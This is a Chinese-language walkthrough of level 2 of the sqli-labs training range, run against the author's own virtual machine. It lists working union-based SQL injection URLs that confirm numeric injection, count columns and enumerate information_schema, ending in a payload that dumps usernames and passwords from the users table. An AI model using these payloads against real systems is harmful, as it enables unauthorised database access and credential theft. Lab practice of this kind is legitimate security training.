sqli-labs靶场第二关less-2
sqli-labs靶场第二关less-2
本次测试在虚拟机搭建靶场,从主机测试
1、输入?id=1和?id=2发现有不同的页面回显
2、判断注入类型
http://192.168.128.3/sq/Less-2/?id=1’
从回显判断多一个‘ ,预测可能是数字型注入
输入
http://192.168.128.3/sq/Less-2/?id=1 and 1=1
http://192.168.128.3/sq/Less-2/?id=1 and 1=2发现and 1=1 正常回显,and 1=2 回显错误,确定数字型注入
3、确定列数
http://192.168.128.3/sq/Less-2/?id=1 group by 5
http://192.168.128.3/sq/Less-2/?id=1 group by 4
http://192.168.128.3/sq/Less-2/?id=1 group by 3
group by 3 的时候回显正常,确定有三列。
4、确定回显位
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,2,3
2.3位为回显位
5、查询数据库名和版本
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,database(),version()
6、爆出数据库名
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
7、爆出表名
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’
8、爆出列名
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’
9、爆出数据
http://192.168.128.3/sq/Less-2/?id=-1 union select 1,group_concat(username,‘~’,password),3 from security.users
** 大功告成**